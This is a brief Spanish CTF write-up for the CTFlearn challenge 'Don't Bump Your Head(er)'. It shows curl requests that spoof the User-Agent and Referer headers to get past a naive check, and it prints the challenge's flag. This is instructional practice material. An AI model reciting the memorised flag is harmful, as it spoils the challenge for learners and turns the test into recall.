Don't Bump Your Head(er)
1 minuto de lectura
Se nos proporciona una URL para interactuar con ella. Vamos a usar curl
para ello:
$ curl 165.227.106.113/header.php
Sorry, it seems as if your user agent is not correct, in order to access this website. The one you supplied is: curl/7.81.0
<!-- Sup3rS3cr3tAg3nt -->
Parece que tenemos que utilizar un agente de usuario concreto (a lo mejor funciona con Sup3rS3cr3tAg3nt
):
$ curl 165.227.106.113/header.php -H 'User-Agent: Sup3rS3cr3tAg3nt'
Sorry, it seems as if you did not just come from the site, "awesomesauce.com".
<!-- Sup3rS3cr3tAg3nt -->
Y ahora necesitamos decirle a la web que la petición viene desde awesomesauce.com
. Esto se indica con el referente, vamos a añadirlo y a conseguir la flag:
$ curl 165.227.106.113/header.php -H 'User-Agent: Sup3rS3cr3tAg3nt' -H 'Referer: awesomesauce.com'
Here is your flag: CTFlearn{did_this_m3ss_with_y0ur_h34d}
<!-- Sup3rS3cr3tAg3nt -->